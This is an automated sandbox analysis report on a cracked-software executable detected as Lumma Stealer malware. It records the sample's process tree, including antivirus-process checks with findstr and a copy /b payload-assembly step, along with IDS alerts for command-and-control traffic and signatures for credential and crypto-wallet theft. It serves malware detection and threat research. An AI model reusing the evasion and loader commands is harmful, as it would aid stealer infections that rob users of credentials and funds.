Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vce exam simulator 2.2.1 crackk.exe

Overview

General Information

Sample name:vce exam simulator 2.2.1 crackk.exe
Analysis ID:1580415
MD5:636555b743ce6aeb326544eb56e8b5e9
SHA1:18a672fa6c98b7f54e2c49daf5b33d92925a9ca4
SHA256:863f990882827996b28b0d7efc6f02c9b734a4ea8f7ef18d777bc8ed8ff214cc
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • vce exam simulator 2.2.1 crackk.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe" MD5: 636555B743CE6AEB326544EB56E8B5E9)
    • cmd.exe (PID: 7396 cmdline: "C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7456 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7464 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7500 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7508 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7552 cmdline: cmd /c md 459250 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7568 cmdline: findstr /V "Sorry" Branches MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7584 cmdline: cmd /c copy /b ..\Penalties + ..\Let + ..\No + ..\Giant + ..\Instance + ..\Reed + ..\Hawk y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Spa.com (PID: 7600 cmdline: Spa.com y MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 7616 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Spa.com PID: 7600JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Spa.com PID: 7600JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Spa.com PID: 7600JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

            Sigma Signatures

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sigma detected: Search for Antivirus process
            Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7396, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7508, ProcessName: findstr.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T13:52:40.597951+010020283713Unknown Traffic192.168.2.449736104.21.33.227443TCP
            2024-12-24T13:52:42.837509+010020283713Unknown Traffic192.168.2.449737104.21.33.227443TCP
            2024-12-24T13:52:45.420635+010020283713Unknown Traffic192.168.2.449738104.21.33.227443TCP
            2024-12-24T13:52:48.910081+010020283713Unknown Traffic192.168.2.449739104.21.33.227443TCP
            2024-12-24T13:52:51.213434+010020283713Unknown Traffic192.168.2.449740104.21.33.227443TCP
            2024-12-24T13:52:53.831695+010020283713Unknown Traffic192.168.2.449741104.21.33.227443TCP
            2024-12-24T13:52:56.289015+010020283713Unknown Traffic192.168.2.449742104.21.33.227443TCP
            2024-12-24T13:53:00.764066+010020283713Unknown Traffic192.168.2.449743104.21.33.227443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T13:52:41.425333+010020546531A Network Trojan was detected192.168.2.449736104.21.33.227443TCP
            2024-12-24T13:52:43.719925+010020546531A Network Trojan was detected192.168.2.449737104.21.33.227443TCP
            2024-12-24T13:53:01.644646+010020546531A Network Trojan was detected192.168.2.449743104.21.33.227443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T13:52:41.425333+010020498361A Network Trojan was detected192.168.2.449736104.21.33.227443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T13:52:43.719925+010020498121A Network Trojan was detected192.168.2.449737104.21.33.227443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T13:52:49.806140+010020480941Malware Command and Control Activity Detected192.168.2.449739104.21.33.227443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T13:52:56.292468+010028438641A Network Trojan was detected192.168.2.449742104.21.33.227443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results
            Source: vce exam simulator 2.2.1 crackk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: vce exam simulator 2.2.1 crackk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: hmmapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: umdmxfrm.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdadc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mprext.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msident.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pstorec.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odpdx32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WSClient.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifmon.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ODBCCR32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ws2help.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-shutdown-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: fvecerts.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mscat32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: framedyn.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: sqlxmlx.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msctfui.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mprext.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WinSyncMetastore.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: hnetmon.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: CHxReadingStringIME.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: dfshim.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mscpxl32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaenum.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapiperf.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mgmtapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: licmgr10.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: nddeapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-sysinfo-l1-2-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMTCTRLN.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcji32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wshunix.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msimtf.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tient.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-xstate-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMEDICAPICCPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tpmcompc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pdhui.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msjint40.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-datetime-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: httpai.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: MFVFW.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: netfxconfig.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qcx.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcbcp.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfH263Enc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfdvdec.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shpafact.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: httpai.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdasc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rasctrs.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msafd.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: clb.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaenum.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spnet.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mssip32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmpbk32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msident.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mscpxl32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_qcx.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: securebootai.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VscMgrPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pwrshplugin.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: syssetup.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-shcore-stream-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-service-management-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerceptionSimulation.ProxyStubs.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdadc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ProximityCommon.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wlanutil.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pdhui.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsock32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: panmap.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odtext32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-lsalookup-l2-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msctfui.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: umdmxfrm.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ss-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiltcfg.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: lz32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiltcfg.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmpbk32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: hnetmon.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: CHxReadingStringIME.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: vpnikeapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrle32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: usbperf.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: clb.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: winrssrv.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ZipContainer.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Eventing-Controller-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spwinsat.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WinSyncMetastore.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: winrssrv.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RpcNs4.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdasc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: Microsoft.BitLocker.Structures.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msjint40.pdbGetFolderPathAndSubDirWSHELL32.dllc source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifmon.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VscMgrPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qc.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: usbperf.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Eventing-Provider-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pspluginwkr.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: svcext.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrating.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: d.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifsutilx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pcwum.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SyncInfrastructurePS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: time-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMEDICAPICCPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-stringloader-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsnmp32.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msxactps.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shunimpl.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NcdProp.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RacEngn.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerfCounterInstaller.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: framedyn.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcji32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mdminst.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pstorec.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcbcp.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NetworkItemFactory.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMTCTRLN.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msafd.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaurl.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: dfshim.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: oddbse32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: DBnmpntw.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-privateprofile-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SetIEInstalledDateAI.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-shlwapi-legacy-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ODBCCR32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IEFileInstallAI.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RpcNs4.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shunimpl.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: UserDataTypeHelperUtil.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: grouptrusteeai.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmcfg32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cliconfg.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SetIEInstalledDateAI.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IconCodecService.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Security-LsaPolicy-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmlua.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDPlm.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mdminst.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_qcx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: vpnikeapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: fvecerts.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cliconfg.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mssip32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: LAPRXY.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IconCodecService.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-lsalookup-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDLoader.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: netfxconfig.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiwer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-service-private-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmdrmsdk.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: icmp.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-core-version-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SEMgrPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmstplua.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spnet.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-service-management-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-localization-obsolete-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odpdx32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mscat32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ProximityCommon.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifsutilx.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: security.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: securebootai.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: oddbse32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VirtualDisplayManager.ProxyStubs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SensApi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: nddeapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odexl32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmstplua.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: DBnmpntw.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msjint40.pdbV source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SAS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: icmp.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shpafact.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rasctrs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: Microsoft.BitLocker.Structures.pdbiC source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: icmui.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-service-management-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: uniplat.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: altspace.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mrt100.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: grouptrusteeai.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wshunix.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: security.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-file-l2-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapisysprep.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapiperf.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: licmgr10.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: syssetup.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odexl32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mgmtapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SensApi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NcdProp.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: panmap.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: avicap32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ntlanui2.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RacEngn.pdb source: vce exam simulator 2.2.1 crackk.exe
